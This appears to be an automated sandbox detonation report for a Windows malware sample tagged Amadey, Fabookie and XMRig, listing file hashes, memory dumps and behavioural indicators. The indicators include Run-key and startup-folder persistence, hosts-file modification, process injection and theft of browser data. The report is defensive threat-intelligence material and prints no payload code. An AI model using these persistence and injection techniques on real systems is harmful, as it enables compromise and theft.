| SHA256 | a1e2dba5d5515e5ec61dcd4aa793bd60cefba0f7f5d5afd8c697d77adbd1dc26 |
| SHA512 | 2e6996a3a5edd2d1ec1bc242fde14509e2afcf2f80ebcfbc6aae570a1021cd913490230cf574859a6727072cfb78b58b0412b44b89e82e014eb214709a86dac5 |
memory/1664-837-0x0000000000400000-0x0000000000D68000-memory.dmp
memory/2560-851-0x0000000002E00000-0x0000000003278000-memory.dmp
memory/2560-852-0x0000000000400000-0x0000000000A00000-memory.dmp
memory/2560-853-0x00000000023B0000-0x0000000002814000-memory.dmp
memory/2560-854-0x0000000002820000-0x0000000002CE7000-memory.dmp
memory/2560-855-0x0000000003690000-0x0000000003E82000-memory.dmp
memory/2560-858-0x00000000002B0000-0x00000000002B1000-memory.dmp
memory/2560-862-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-864-0x0000000000AF0000-0x0000000000AF1000-memory.dmp
memory/2560-865-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-866-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-867-0x0000000000B40000-0x0000000000B41000-memory.dmp
memory/2560-868-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-869-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-870-0x0000000003690000-0x0000000003E82000-memory.dmp
memory/2560-859-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-861-0x0000000003690000-0x0000000003E82000-memory.dmp
memory/2560-873-0x0000000077B90000-0x0000000077B91000-memory.dmp
memory/1312-875-0x0000000001360000-0x00000000018AD000-memory.dmp
memory/2560-874-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-872-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-871-0x0000000000B50000-0x0000000000B51000-memory.dmp
memory/2560-876-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-882-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/612-886-0x00000000005A0000-0x00000000005E0000-memory.dmp
memory/2780-884-0x00000000026A0000-0x0000000002E92000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3d56a1152c50bd99ae7e94b824c3aa84 |
| SHA1 | f28e9da54c773d595e9f4e6906de7c3618769b07 |
| SHA256 | 8432e210f264d43b04f97972910c6060a0177aa3d2281863ee526c0ff53e28f1 |
| SHA512 | be9eb53438e3d2efab8be1800a105895dd761b0c1dace75b1907ae1608a0415fb070ee307519bcb349dc64ab8f80be3aeb4236a1533ec60072f7940d33c6ac5c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 6a6f26abc83252a905f2bbc4bffe4534 |
| SHA1 | 06ad7e53dbd36893ecc3494a2c828504aa9fced7 |
| SHA256 | 1fd1afb620488707c5e453afa2f4b5d33b9330d04882d8f0e8782ee2e39efe07 |
| SHA512 | 5f7b4ada34979e99f6706d3e09bca4f2610e0e0a42cfa019e438f6ac61c74b76f98e1dcab8e54321a0ead7d0a3db167579acb6cff3c7635da04d93b9f576035a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c187a851ce4a049916b279fda5ae9fee |
| SHA1 | 4edb66f4095f8910ef4ca9c869d0fe54c0218320 |
| SHA256 | 996608078048a5ed968813185a6573ef4451e9581adeaa93ee4591ce055410b3 |
| SHA512 | b3129f9d61997484adfaa586c7f33446af9fafeda6d2a6ce77039bbe9bc004cfd313d2d9be3c854b179ef3197949f17d51a64d2c47b099c637bfaf96ff4b4699 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c1f64e0ef258bd41b7d8bbeb3e5c090a |
| SHA1 | ad35259da289ab52ff55a1a5cc6a4be64c49d031 |
| SHA256 | 6f7b571a395636fade125ffc4579c0fa09fa5596cd621b45f703bee14de5f222 |
| SHA512 | e5f3255977fdfe122f970e4f3949adf6cb9e8554876a0c2e6e368789f0903a3768a075eb22ab4055d8394e8baca417fd0a8b3e54d8e3ff4caaf7b05f45f769d4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b0171da4293f9d86730c0ce7483cf29c |
| SHA1 | d464280be869bb3730c32bc5ae4ca979802ed1be |
| SHA256 | a3512ba96ac8c2a233b5642a49ce90c80c6b58d3aadcc888294dd3027ad75962 |
| SHA512 | a2878e7a671984d73f6fbe124cd532fde26b41af0815f068b8c5fc3da1dd32ff423dc8d4d48c430b64d27a0f4df8c85c5b64176c3889f5856cd5274e9adb2c63 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | eae46c2ab432a15e03f513708a782051 |
| SHA1 | 5adf32dc8b99f06d2fe1f4e0fd8041ade284b655 |
| SHA256 | 3b399d29ef5f7d9ff775843900b35e2e005caf2d5a67a64ea7f6aad12b51447e |
| SHA512 | 6e0602575dc9073ad42ef6ebd7bfa0ec0b006f7d37125a03487c34dfd76ddda3cb51cea630728605035ec575ffc25ed252b09297fa51fea791439fbea05f398d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | e4a68ac854ac5242460afd72481b2a44 |
| SHA1 | df3c24f9bfd666761b268073fe06d1cc8d4f82a4 |
| SHA256 | cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f |
| SHA512 | 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6abafa80fdc8f6d30a4cc81905669870 |
| SHA1 | b733ce6d6fc9639cedc3cd55286a859b5f3f3087 |
| SHA256 | e7e47f779fd976b80c5897e2ddc3da4bfad0029e7ef963155220c6e86c50a1af |
| SHA512 | d8828559d7a8e1287cdbbbd7a59b8ebd41978f603696a2d2f216c94d4aed446fb4d86d1544e88fdc733d72b39d9bf11edd6ef7779e9be7c38c51ab35347b8af6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 52598c22f1919f8b69ac1f7a178242c8 |
| SHA1 | 9f606de06971e88c1092bf57da3eab9f053d994d |
| SHA256 | 2d13679e504416e221513f327274f1cf01c718d9c11a900e1d12586161fd01e9 |
| SHA512 | 3a3b421343f0e62479cf0ba977437a3b9fa1ecc53cdac422dedcd6cd36ebddfd8570db550f9bb0e8b0df55bf5924f210f0aa150ae62b33c979d3dc526714ef65 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c27a8d110e37966beceef491129f293d |
| SHA1 | 44ff3cdf91f425c6cab816532456ab0caf570114 |
| SHA256 | 827524d9fdf1c1108601829fd08341b8caa239198f6c284d063e76d877a4645b |
| SHA512 | 524d03a1eff1805501953a1da6c4f96e10d7e93516e8b03a35ac8f7e67672cd906f39f232a0517e77ddc6818c94a6e4a26180abba20de3ea0e081b3991d46c14 |
C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll
| MD5 | 49b3faf5b84f179885b1520ffa3ef3da |
| SHA1 | c1ac12aeca413ec45a4f09aa66f0721b4f80413e |
| SHA256 | b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5 |
| SHA512 | 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742 |
C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll
| MD5 | 4bd56443d35c388dbeabd8357c73c67d |
| SHA1 | 26248ce8165b788e2964b89d54d1f1125facf8f9 |
| SHA256 | 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867 |
| SHA512 | 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e3e486300f7a5e60d16da2d54f0ebaab |
| SHA1 | bbfa9149485910b6d4ef6d009e68d8cb811e59ee |
| SHA256 | be9969dddf21bc815b53e61b91c203dd70f70aecc1039b0c22057fb28be0a634 |
| SHA512 | 0705d1262adf09d74ce14c0553dfb9f71e34cdcf393eca999f8ef7ae33a34f746e062749e805dcf90ad56d3bbc0f9840fc845ab14c85e2300ea78bf946433126 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5fb16cbeb4586fdb0b944cedeef1258f |
| SHA1 | 4b14b8a23c85ae1781682307ed2690110cf1b0e4 |
| SHA256 | d325e39ba1781f964571b110acebfec494fa7860b5111eb17f5c55ec3ce4bdc2 |
| SHA512 | 7b0abcbb84bdf305435e7564c9c31065285ce0ef3df83df1a4a677c5a4708483803bb0af0d91aaa21b27aabc9fbcfad3b1cb933bfb423943e2404910855700bf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 361c0b8c80e64a74c7c54ac45e55c088 |
| SHA1 | 8aa251164798e8cc8f7bff95bfb55955ab0ddf19 |
| SHA256 | 41f5484b2988e219a7c7fc82a3b5f000e58315a8c9a22259d68ffb9bc7667970 |
| SHA512 | 33d1b3fc91add5c86a3251e4396690bd62c1681f06d6819a97455088fd442c3471fa1686b1fb4502b094b58f3ea8bc5a873155da16ac1c71b40b2b4b3f06360b |
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PL78BP4I\suggestions[1].en-US
| MD5 | 5a34cb996293fde2cb7a4ac89587393a |
| SHA1 | 3c96c993500690d1a77873cd62bc639b3a10653f |
| SHA256 | c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad |
| SHA512 | e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | 5da3a881ef991e8010deed799f1a5aaf |
| SHA1 | fea1acea7ed96d7c9788783781e90a2ea48c1a53 |
| SHA256 | f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4 |
| SHA512 | 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-10-04 22:00
Reported
2023-10-04 22:03
Platform
win10v2004-20230915-en
Max time kernel
133s
Max time network
151s
Command Line
Signatures
Amadey
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fabookie
Suspicious use of NtCreateUserProcessOtherParentProcess
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe | N/A |
Stops running service(s)
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5nEFLhvur3PfnWFfqazVcbhe.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dGIPEz9n7OVcihVvNtfHAic4.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kO1KRPG4oOONnPKyWWQ2An2Q.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pVTXkOiHKAHqCqYAnM2rV6H6.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Kr27Ey1NE3Y5Notxl7fEKGsO.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TZSRnhFzitYjo4TnClmGKisZ.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\onywQULHStPc8A2RYT8Y8uYa.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0uoHVTc55FxRhaUsghlx8u5i.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C6PPl873Avd8oxJhqrrnG8Bj.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XnjZeeJD8ofcRSwPBBC26dmy.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\m2P2rA2RW0F7IB2YG1D51LnQ.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\s6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000042051\\s6.exe" | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\Civutisudi.exe\"" | C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4516 set thread context of 1640 | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe |
| PID 4616 set thread context of 6044 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\conhost.exe |
| PID 4616 set thread context of 6080 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\explorer.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe | C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe | N/A |
| File opened for modification | C:\Program Files (x86)\LightCleaner\VTRegScan.dll | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File created | C:\Program Files (x86)\LightCleaner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File created | C:\Program Files (x86)\LightCleaner\is-K12OK.tmp | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\LightCleaner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File created | C:\Program Files (x86)\Mozilla Maintenance Service\Civutisudi.exe | C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe | N/A |
| File opened for modification | C:\Program Files (x86)\LightCleaner\LightCleaner.exe | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\LightCleaner\CircularProgressBar.dll | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File created | C:\Program Files (x86)\LightCleaner\is-GAF4Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe | N/A |
| File created | C:\Program Files (x86)\Mozilla Maintenance Service\Civutisudi.exe.config | C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe | N/A |
| File created | C:\Program Files (x86)\LightCleaner\is-QQE4Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File created | C:\Program Files (x86)\LightCleaner\is-AGPK8.tmp | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File created | C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe.config | C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe | N/A |
| File created | C:\Program Files (x86)\LightCleaner\is-DRIA0.tmp | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
